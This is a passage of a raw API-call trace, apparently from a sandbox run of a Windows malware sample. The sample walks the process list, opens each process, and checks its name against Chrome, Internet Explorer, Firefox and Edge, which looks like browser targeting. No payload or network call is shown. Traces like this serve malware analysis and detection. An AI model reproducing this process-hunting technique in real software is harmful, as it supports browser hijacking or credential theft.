	[0210.942] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x38d8
	[0210.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.943] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.943] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.944] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.944] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.944] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x38dc
	[0210.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.945] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.945] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.946] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.946] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.946] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x38e0
	[0210.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.947] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.947] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.948] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.948] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.948] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x38e4
	[0210.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.949] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.949] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.950] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.950] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.950] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x38e8
	[0210.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.951] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.951] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.951] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.952] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.952] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.953] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x38ec
	[0210.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.953] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.953] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.953] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.954] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.954] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.955] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x38f0
	[0210.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.955] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.955] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.955] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.956] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.956] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0210.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x38f4
	[0210.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.957] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0210.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.957] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.957] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0210.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.958] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.958] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.959] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x38f8
	[0210.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.959] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.959] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.960] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.960] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.960] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0210.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x38fc
	[0210.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.961] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.962] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.962] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.962] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.963] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0210.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3900
	[0210.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.963] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0210.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.964] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.964] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0210.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.964] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.964] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3904
	[0210.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.965] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.965] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.966] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.966] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.966] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0210.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3908
	[0210.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.967] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0210.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.967] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.968] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0210.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.968] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.968] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0210.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x390c
	[0210.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.969] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0210.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.969] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.970] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0210.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.970] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.970] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0210.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3910
	[0210.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.971] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0210.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.971] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.971] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0210.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.972] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.972] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0210.972] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3914
	[0210.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.973] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0210.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.973] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.973] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0210.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.973] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.974] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0210.974] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0210.974] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0210.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3918
	[0210.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.975] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0210.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.976] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.976] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0210.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.977] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.977] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0210.978] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x391c
	[0210.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.978] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0210.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.978] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.979] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0210.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.979] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.979] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0210.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3920
	[0210.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.980] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0210.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.980] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.981] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0210.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.981] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.981] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0210.982] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3924
	[0210.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.982] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0210.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.982] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.983] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0210.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.983] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.983] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0210.984] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3928
	[0210.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.984] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0210.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.984] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.985] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0210.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.985] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.986] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0210.986] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x392c
	[0210.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.987] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0210.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.987] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.987] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0210.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.987] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.988] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0210.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3930
	[0210.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.989] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0210.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.989] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.989] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0210.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.990] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.990] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0210.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3934
	[0210.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.991] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0210.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.991] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.992] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0210.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.992] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.993] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0210.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3938
	[0210.993] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.993] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
